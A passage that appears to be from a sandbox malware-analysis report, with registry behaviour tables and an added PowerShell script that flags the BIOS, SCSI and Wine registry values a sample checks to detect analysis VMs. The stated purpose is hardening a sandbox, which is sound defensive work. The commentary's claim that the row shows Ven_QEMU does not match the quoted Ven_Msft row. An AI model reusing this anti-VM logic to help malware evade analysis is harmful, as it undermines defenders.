| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
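Three tables in this report show the sample fingerprinting its environment through the registry: SystemBiosVersion and VideoBiosVersion under "Checks BIOS information in registry" (read by several of the dropped executables), the HKCU\Software\Wine key under "Identifies Wine through registry keys", and the SCSI device enumeration above. The SCSI rows are attributed to explorer.exe and match what the shell does when it enumerates drives, so on their own they are not an indicator; what matters is the vendor strings they expose, Ven_QEMU and Prod_Virtual_DVD-ROM here, which are exactly what a VM check looks for. The script below is an added example for this page, not sandbox output or code from any family in the report: it reads the same locations on the machine it runs on and reports which values would give an analysis VM away, which is useful when hardening a sandbox against this sample. The marker-string list is an assumption drawn from common anti-VM checks, not from the sample.

```powershell
# Added example: read the registry locations this sample queried and flag
# values that reveal a virtual machine or a Wine environment.

$VmMarkers = 'VBOX', 'VIRTUALBOX', 'QEMU', 'VMWARE', 'VIRTUAL', 'XEN', 'HYPER-V', 'BOCHS', 'PARALLELS'

function Test-VmMarker {
    param([string[]]$Values)
    foreach ($v in $Values) {
        if (-not $v) { continue }
        $upper = $v.ToUpperInvariant()
        foreach ($m in $VmMarkers) {
            if ($upper.Contains($m)) { return $m }
        }
    }
    return $null
}

$results = [System.Collections.Generic.List[object]]::new()

# 1. Firmware version strings (REG_MULTI_SZ) under HARDWARE\DESCRIPTION\System.
$desc = Get-ItemProperty 'HKLM:\HARDWARE\DESCRIPTION\System' -ErrorAction SilentlyContinue
foreach ($name in 'SystemBiosVersion', 'VideoBiosVersion') {
    $vals = @($desc.$name)
    $results.Add([pscustomobject]@{
        Check  = "HARDWARE\DESCRIPTION\System\$name"
        Value  = ($vals -join ' | ')
        Marker = Test-VmMarker $vals
    })
}

# 2. SCSI enumeration. The device key name itself carries Ven_/Prod_ strings,
#    so it is checked alongside each instance's FriendlyName.
$scsiRoot = 'HKLM:\SYSTEM\CurrentControlSet\Enum\SCSI'
foreach ($devKey in Get-ChildItem $scsiRoot -ErrorAction SilentlyContinue) {
    foreach ($inst in Get-ChildItem $devKey.PSPath -ErrorAction SilentlyContinue) {
        $friendly = [string]$inst.GetValue('FriendlyName')
        $results.Add([pscustomobject]@{
            Check  = "Enum\SCSI\$($devKey.PSChildName)"
            Value  = $friendly
            Marker = Test-VmMarker @($devKey.PSChildName, $friendly)
        })
    }
}

# 3. Wine. The sample only opens the key; its existence is the whole signal.
$winePresent = Test-Path 'HKCU:\Software\Wine'
$results.Add([pscustomobject]@{
    Check  = 'HKCU\Software\Wine'
    Value  = if ($winePresent) { 'present' } else { 'absent' }
    Marker = if ($winePresent) { 'WINE' } else { $null }
})

$results | Format-Table -AutoSize -Wrap
$hits = @($results | Where-Object Marker)
"Fingerprintable values: $($hits.Count)"
```

Run on an unmodified sandbox image the output usually lists the hypervisor's own CD-ROM and disk identifiers, as this report's SCSI table does for QEMU; renaming those device strings and supplying vendor-looking BIOS version strings removes the cheapest checks, although a sample can still fall back to CPUID, timing or the ACPI values mentioned in the summary.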
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\r1041sr.lxa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\de-DE-N\\tn1031.bin" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Zira" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 2 0009 aa 000a ae 000b ah 000c ao 000d aw 000e ax 000f ay 0010 b 0011 ch 0012 d 0013 dh 0014 eh 0015 er 0016 ey 0017 f 0018 g 0019 h 001a ih 001b iy 001c jh 001d k 001e l 001f m 0020 n 0021 ng 0022 ow 0023 oy 0024 p 0025 r 0026 s 0027 sh 0028 t 0029 th 002a uh 002b uw 002c v 002d w 002e y 002f z 0030 zh 0031" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - fr-FR Embedded DNN v11.1" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Paul" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "You have selected %1 as the default voice." | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 + 0008 * 0009 1 000A 2 000B 3 000C 4 000D 5 000E a 000F ai 0010 an 0011 ang 0012 ao 0013 ba 0014 bai 0015 ban 0016 bang 0017 bao 0018 bei 0019 ben 001A beng 001B bi 001C bian 001D biao 001E bie 001F bin 0020 bing 0021 bo 0022 bu 0023 ca 0024 cai 0025 can 0026 cang 0027 cao 0028 ce 0029 cen 002A ceng 002B cha 002C chai 002D chan 002E chang 002F chao 0030 che 0031 chen 0032 cheng 0033 chi 0034 chong 0035 chou 0036 chu 0037 chuai 0038 chuan 0039 chuang 003A chui 003B chun 003C chuo 003D ci 003E cong 003F cou 0040 cu 0041 cuan 0042 cui 0043 cun 0044 cuo 0045 da 0046 dai 0047 dan 0048 dang 0049 dao 004A de 004B dei 004C den 004D deng 004E di 004F dia 0050 dian 0051 diao 0052 die 0053 ding 0054 diu 0055 dong 0056 dou 0057 du 0058 duan 0059 dui 005A dun 005B duo 005C e 005D ei 005E en 005F er 0060 fa 0061 fan 0062 fang 0063 fei 0064 fen 0065 feng 0066 fo 0067 fou 0068 fu 0069 ga 006A gai 006B gan 006C gang 006D gao 006E ge 006F gei 0070 gen 0071 geng 0072 gong 0073 gou 0074 gu 0075 gua 0076 guai 0077 guan 0078 guang 0079 gui 007A gun 007B guo 007C ha 007D hai 007E han 007F hang 0080 hao 0081 he 0082 hei 0083 hen 0084 heng 0085 hong 0086 hou 0087 hu 0088 hua 0089 huai 008A huan 008B huang 008C hui 008D hun 008E huo 008F ji 0090 jia 0091 jian 0092 jiang 0093 jiao 0094 jie 0095 jin 0096 jing 0097 jiong 0098 jiu 0099 ju 009A juan 009B jue 009C jun 009D ka 009E kai 009F kan 00A0 kang 00A1 kao 00A2 ke 00A3 kei 00A4 ken 00A5 keng 00A6 kong 00A7 kou 00A8 ku 00A9 kua 00AA kuai 00AB kuan 00AC kuang 00AD kui 00AE kun 00AF kuo 00B0 la 00B1 lai 00B2 lan 00B3 lang 00B4 lao 00B5 le 00B6 lei 00B7 leng 00B8 li 00B9 lia 00BA lian 00BB liang 00BC liao 00BD lie 00BE lin 00BF ling 00C0 liu 00C1 lo 00C2 long 00C3 lou 00C4 lu 00C5 luan 00C6 lue 00C7 lun 00C8 luo 00C9 lv 00CA ma 00CB mai 00CC man 00CD mang 00CE mao 00CF me 00D0 mei 00D1 men 00D2 meng 00D3 mi 00D4 mian 00D5 miao 00D6 mie 00D7 min 00D8 ming 00D9 miu 00DA mo 00DB mou 00DC mu 00DD na 00DE nai 00DF nan 00E0 nang 00E1 nao 00E2 ne 00E3 nei 00E4 nen 00E5 neng 00E6 ni 00E7 nian 00E8 niang 00E9 niao 00EA nie 00EB nin 00EC ning 00ED niu 00EE nong 00EF nou 00F0 nu 00F1 nuan 00F2 nue 00F3 nuo 00F4 nv 00F5 o 00F6 ou 00F7 pa 00F8 pai 00F9 pan 00FA pang 00FB pao 00FC pei 00FD pen 00FE peng 00FF pi 0100 pian 0101 piao 0102 pie 0103 pin 0104 ping 0105 po 0106 pou 0107 pu 0108 qi 0109 qia 010A qian 010B qiang 010C qiao 010D qie 010E qin 010F qing 0110 qiong 0111 qiu 0112 qu 0113 quan 0114 que 0115 qun 0116 ran 0117 rang 0118 rao 0119 re 011A ren 011B reng 011C ri 011D rong 011E rou 011F ru 0120 ruan 0121 rui 0122 run 0123 ruo 0124 sa 0125 sai 0126 san 0127 sang 0128 sao 0129 se 012A sen 012B seng 012C sha 012D shai 012E shan 012F shang 0130 shao 0131 she 0132 shei 0133 shen 0134 sheng 0135 shi 0136 shou 0137 shu 0138 shua 0139 shuai 013A shuan 013B shuang 013C shui 013D shun 013E shuo 013F si 0140 song 0141 sou 0142 su 0143 suan 0144 sui 0145 sun 0146 suo 0147 ta 0148 tai 0149 tan 014A tang 014B tao 014C te 014D tei 014E teng 014F ti 0150 tian 0151 tiao 0152 tie 0153 ting 0154 tong 0155 tou 0156 tu 0157 tuan 0158 tui 0159 tun 015A tuo 015B wa 015C wai 015D wan 015E wang 015F wei 0160 wen 0161 weng 0162 wo 0163 wu 0164 xi 0165 xia 0166 xian 0167 xiang 0168 xiao 0169 xie 016A xin 016B xing 016C xiong 016D xiu 016E xu 016F xuan 0170 xue 0171 xun 0172 ya 0173 yan 0174 yang 0175 yao 0176 ye 0177 yi 0178 yin 0179 ying 017A yo 017B yong 017C you 017D yu 017E yuan 017F yue 0180 yun 0181 za 0182 zai 0183 zan 0184 zang 0185 zao 0186 ze 0187 zei 0188 zen 0189 zeng 018A zha 018B zhai 018C zhan 018D zhang 018E zhao 018F zhe 0190 zhei 0191 zhen 0192 zheng 0193 zhi 0194 zhong 0195 zhou 0196 zhu 0197 zhua 0198 zhuai 0199 zhuan 019A zhuang 019B zhui 019C zhun 019D zhuo 019E zi 019F zong 01A0 zou 01A1 zu 01A2 zuan 01A3 zui 01A4 zun 01A5 zuo 01A6" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Male" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Hedda" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "11.0.2016.0129" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1041-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\sidubm.table" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\lsr1036.lxa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "È stata selezionata la voce predefinita %1." | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Mark - English (United States)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{57523D96-B7F6-4D2C-8AFC-BCC5F5392E94}" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\de-DE-N\\L1031" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "40C" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "16000" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\de-DE\\VoiceActivation_HW_de-DE.dat" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR fr-FR Lookup Lexicon" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR fr-FR Lts Lexicon" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Anywhere;Trailing" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Spanish (Spain)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\tn1036.bin" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
